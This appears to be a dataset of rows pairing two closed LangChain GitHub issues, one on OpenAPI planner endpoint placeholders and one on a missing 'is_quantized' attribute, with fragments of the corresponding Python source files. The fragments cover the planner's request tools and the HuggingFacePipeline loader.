except json.JSONDecodeError as e:
raise e
response = self.requests_wrapper.post(data["url"], data["data"])
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str:
raise NotImplementedError()
class RequestsPatchToolWithParsing(BaseRequestsTool, BaseTool): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, the OpenAPI planner requires an exact match to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | """Requests PATCH tool with LLM-instructed extraction of truncated responses."""
name: str = "requests_patch"
"""Tool name."""
description = REQUESTS_PATCH_TOOL_DESCRIPTION
"""Tool description."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""Maximum length of the response to be returned."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_PATCH_PROMPT)
)
"""LLMChain used to extract the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
response = self.requests_wrapper.patch(data["url"], data["data"])
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str:
raise NotImplementedError()
class RequestsPutToolWithParsing(BaseRequestsTool, BaseTool): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, the OpenAPI planner requires an exact match to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | """Requests PUT tool with LLM-instructed extraction of truncated responses."""
name: str = "requests_put"
"""Tool name."""
description = REQUESTS_PUT_TOOL_DESCRIPTION
"""Tool description."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""Maximum length of the response to be returned."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_PUT_PROMPT)
)
"""LLMChain used to extract the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
response = self.requests_wrapper.put(data["url"], data["data"])
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str:
raise NotImplementedError()
class RequestsDeleteToolWithParsing(BaseRequestsTool, BaseTool): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, the OpenAPI planner requires an exact match to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | """A tool that sends a DELETE request and parses the response."""
name: str = "requests_delete"
"""The name of the tool."""
description = REQUESTS_DELETE_TOOL_DESCRIPTION
"""The description of the tool."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""The maximum length of the response."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_DELETE_PROMPT)
)
"""The LLM chain used to parse the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
response = self.requests_wrapper.delete(data["url"])
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, the OpenAPI planner requires an exact match to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | raise NotImplementedError()
#
#
def _create_api_planner_tool(
api_spec: ReducedOpenAPISpec, llm: BaseLanguageModel
) -> Tool:
endpoint_descriptions = [
f"{name} {description}" for name, description, _ in api_spec.endpoints
]
prompt = PromptTemplate(
template=API_PLANNER_PROMPT,
input_variables=["query"],
partial_variables={"endpoints": "- " + "- ".join(endpoint_descriptions)},
)
chain = LLMChain(llm=llm, prompt=prompt)
tool = Tool(
name=API_PLANNER_TOOL_NAME,
description=API_PLANNER_TOOL_DESCRIPTION,
func=chain.run,
)
return tool
def _create_api_controller_agent( |
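A tiny illustration of how the planner prompt's `{endpoints}` partial is assembled from `(name, description, docs)` tuples in `_create_api_planner_tool` above; the tuples are invented, and the join deliberately mirrors the source, which inserts no newline between items:

```python
# Invented endpoint tuples standing in for api_spec.endpoints.
endpoints = [
    ("GET /states/{abbr}", "Fetch one state.", {}),
    ("POST /states", "Create a state.", {}),
]
endpoint_descriptions = [f"{name} {description}" for name, description, _ in endpoints]
# Same expression as the source above; note that "- ".join adds no newline.
print("- " + "- ".join(endpoint_descriptions))
# -> - GET /states/{abbr} Fetch one state.- POST /states Create a state.
```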
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, the OpenAPI planner requires an exact match to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | api_url: str,
api_docs: str,
requests_wrapper: RequestsWrapper,
llm: BaseLanguageModel,
) -> AgentExecutor:
get_llm_chain = LLMChain(llm=llm, prompt=PARSING_GET_PROMPT)
post_llm_chain = LLMChain(llm=llm, prompt=PARSING_POST_PROMPT)
tools: List[BaseTool] = [
RequestsGetToolWithParsing(
requests_wrapper=requests_wrapper, llm_chain=get_llm_chain
),
RequestsPostToolWithParsing(
requests_wrapper=requests_wrapper, llm_chain=post_llm_chain
), |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, the OpenAPI planner requires an exact match to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | ]
prompt = PromptTemplate(
template=API_CONTROLLER_PROMPT,
input_variables=["input", "agent_scratchpad"],
partial_variables={
"api_url": api_url,
"api_docs": api_docs,
"tool_names": ", ".join([tool.name for tool in tools]),
"tool_descriptions": "\n".join(
[f"{tool.name}: {tool.description}" for tool in tools]
),
},
)
agent = ZeroShotAgent(
llm_chain=LLMChain(llm=llm, prompt=prompt),
allowed_tools=[tool.name for tool in tools],
)
return AgentExecutor.from_agent_and_tools(agent=agent, tools=tools, verbose=True)
def _create_api_controller_tool(
api_spec: ReducedOpenAPISpec,
requests_wrapper: RequestsWrapper,
llm: BaseLanguageModel,
) -> Tool:
"""Expose controller as a tool.
The tool is invoked with a plan from the planner, and dynamically
creates a controller agent with relevant documentation only to
constrain the context.
"""
base_url = api_spec.servers[0]["url"]
def _create_and_run_api_controller_agent(plan_str: str) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, the OpenAPI planner requires an exact match to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | pattern = r"\b(GET|POST|PATCH|DELETE)\s+(/\S+)*"
matches = re.findall(pattern, plan_str)
endpoint_names = [
"{method} {route}".format(method=method, route=route.split("?")[0])
for method, route in matches
]
endpoint_docs_by_name = {name: docs for name, _, docs in api_spec.endpoints}
docs_str = ""
for endpoint_name in endpoint_names:
docs = endpoint_docs_by_name.get(endpoint_name)
if not docs:
raise ValueError(f"{endpoint_name} endpoint does not exist.")
docs_str += f"== Docs for {endpoint_name} == \n{yaml.dump(docs)}\n"
agent = _create_api_controller_agent(base_url, docs_str, requests_wrapper, llm)
return agent.run(plan_str)
return Tool(
name=API_CONTROLLER_TOOL_NAME,
func=_create_and_run_api_controller_agent,
description=API_CONTROLLER_TOOL_DESCRIPTION,
)
def create_openapi_agent( |
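To make the exact-match limitation from issue 2938 concrete, here is a runnable trace of the lookup performed by `_create_and_run_api_controller_agent` above; the docs dict is a stand-in for a reduced spec:

```python
import re

pattern = r"\b(GET|POST|PATCH|DELETE)\s+(/\S+)*"
plan = "1. GET /states/FL to look up the state."
method, route = re.findall(pattern, plan)[0]
endpoint_name = "{method} {route}".format(method=method, route=route.split("?")[0])

endpoint_docs_by_name = {"GET /states/{abbr}": "docs..."}  # stand-in spec
print(endpoint_name)                           # GET /states/FL
print(endpoint_name in endpoint_docs_by_name)  # False -> the ValueError path
```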
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, the OpenAPI planner requires an exact match to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | api_spec: ReducedOpenAPISpec,
requests_wrapper: RequestsWrapper,
llm: BaseLanguageModel,
shared_memory: Optional[ReadOnlySharedMemory] = None,
callback_manager: Optional[BaseCallbackManager] = None,
verbose: bool = True,
agent_executor_kwargs: Optional[Dict[str, Any]] = None,
**kwargs: Dict[str, Any],
) -> AgentExecutor:
"""Instantiate OpenAI API planner and controller for a given spec.
Inject credentials via requests_wrapper.
We use a top-level "orchestrator" agent to invoke the planner and controller, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, the OpenAPI planner requires an exact match to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | rather than a top-level planner
that invokes a controller with its plan. This is to keep the planner simple.
"""
tools = [
_create_api_planner_tool(api_spec, llm),
_create_api_controller_tool(api_spec, requests_wrapper, llm),
]
prompt = PromptTemplate(
template=API_ORCHESTRATOR_PROMPT,
input_variables=["input", "agent_scratchpad"],
partial_variables={
"tool_names": ", ".join([tool.name for tool in tools]),
"tool_descriptions": "\n".join(
[f"{tool.name}: {tool.description}" for tool in tools]
),
},
)
agent = ZeroShotAgent(
llm_chain=LLMChain(llm=llm, prompt=prompt, memory=shared_memory),
allowed_tools=[tool.name for tool in tools],
**kwargs,
)
return AgentExecutor.from_agent_and_tools(
agent=agent,
tools=tools,
callback_manager=callback_manager,
verbose=verbose,
**(agent_executor_kwargs or {}),
) |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2. cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3. python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
  warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
  warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
  warnings.warn(
Traceback (most recent call last):
  File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
    model = HuggingFacePipeline.from_model_id(model_id=model_path,
  File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
    model.is_quantized
  File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
    raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | from __future__ import annotations
import importlib.util
import logging
from typing import Any, List, Mapping, Optional
from langchain.callbacks.manager import CallbackManagerForLLMRun
from langchain.llms.base import BaseLLM
from langchain.llms.utils import enforce_stop_tokens
from langchain.pydantic_v1 import Extra
from langchain.schema import Generation, LLMResult
DEFAULT_MODEL_ID = "gpt2"
DEFAULT_TASK = "text-generation"
VALID_TASKS = ("text2text-generation", "text-generation", "summarization")
DEFAULT_BATCH_SIZE = 4
logger = logging.getLogger(__name__)
class HuggingFacePipeline(BaseLLM): |
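One defensive pattern that would sidestep the traceback reported above is to guard the optional attribute with `getattr` instead of reading it directly. This is a sketch of the general technique, not necessarily the change merged in the linked PR:

```python
from transformers import AutoModelForCausalLM

model = AutoModelForCausalLM.from_pretrained("gpt2")
# llama-family models (and older transformers versions) may not define
# `is_quantized`, so default to False rather than raising AttributeError.
quantized = getattr(model, "is_quantized", False)
print(quantized)
```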
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2. cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3. python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
  warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
  warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
  warnings.warn(
Traceback (most recent call last):
  File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
    model = HuggingFacePipeline.from_model_id(model_id=model_path,
  File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
    model.is_quantized
  File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
    raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | """HuggingFace Pipeline API.
To use, you should have the ``transformers`` python package installed.
Only supports `text-generation`, `text2text-generation` and `summarization` for now.
Example using from_model_id:
.. code-block:: python
from langchain.llms import HuggingFacePipeline
hf = HuggingFacePipeline.from_model_id(
model_id="gpt2",
task="text-generation",
pipeline_kwargs={"max_new_tokens": 10},
)
Example passing pipeline in directly:
.. code-block:: python
from langchain.llms import HuggingFacePipeline
from transformers import AutoModelForCausalLM, AutoTokenizer, pipeline
model_id = "gpt2"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id)
pipe = pipeline(
"text-generation", model=model, tokenizer=tokenizer, max_new_tokens=10 |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2. cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3. python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | )
hf = HuggingFacePipeline(pipeline=pipe)
"""
pipeline: Any
model_id: str = DEFAULT_MODEL_ID
"""Model name to use."""
model_kwargs: Optional[dict] = None
"""Keyword arguments passed to the model."""
pipeline_kwargs: Optional[dict] = None
"""Keyword arguments passed to the pipeline."""
batch_size: int = DEFAULT_BATCH_SIZE
"""Batch size to use when passing multiple documents to generate."""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@classmethod
def from_model_id(
cls,
model_id: str,
task: str,
device: Optional[int] = -1,
model_kwargs: Optional[dict] = None,
pipeline_kwargs: Optional[dict] = None,
batch_size: int = DEFAULT_BATCH_SIZE,
**kwargs: Any,
) -> HuggingFacePipeline:
"""Construct the pipeline object from model_id and task."""
try:
from transformers import (
AutoModelForCausalLM, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2. cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3. python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | AutoModelForSeq2SeqLM,
AutoTokenizer,
)
from transformers import pipeline as hf_pipeline
except ImportError:
raise ValueError(
"Could not import transformers python package. "
"Please install it with `pip install transformers`."
)
_model_kwargs = model_kwargs or {}
tokenizer = AutoTokenizer.from_pretrained(model_id, **_model_kwargs)
try:
if task == "text-generation":
model = AutoModelForCausalLM.from_pretrained(model_id, **_model_kwargs)
elif task in ("text2text-generation", "summarization"):
model = AutoModelForSeq2SeqLM.from_pretrained(model_id, **_model_kwargs)
else:
raise ValueError(
f"Got invalid task {task}, "
f"currently only {VALID_TASKS} are supported"
)
except ImportError as e:
raise ValueError(
f"Could not load the {task} model due to missing dependencies."
) from e
if (
model.is_quantized
or model.model.is_loaded_in_4bit
or model.model.is_loaded_in_8bit
) and device is not None: |
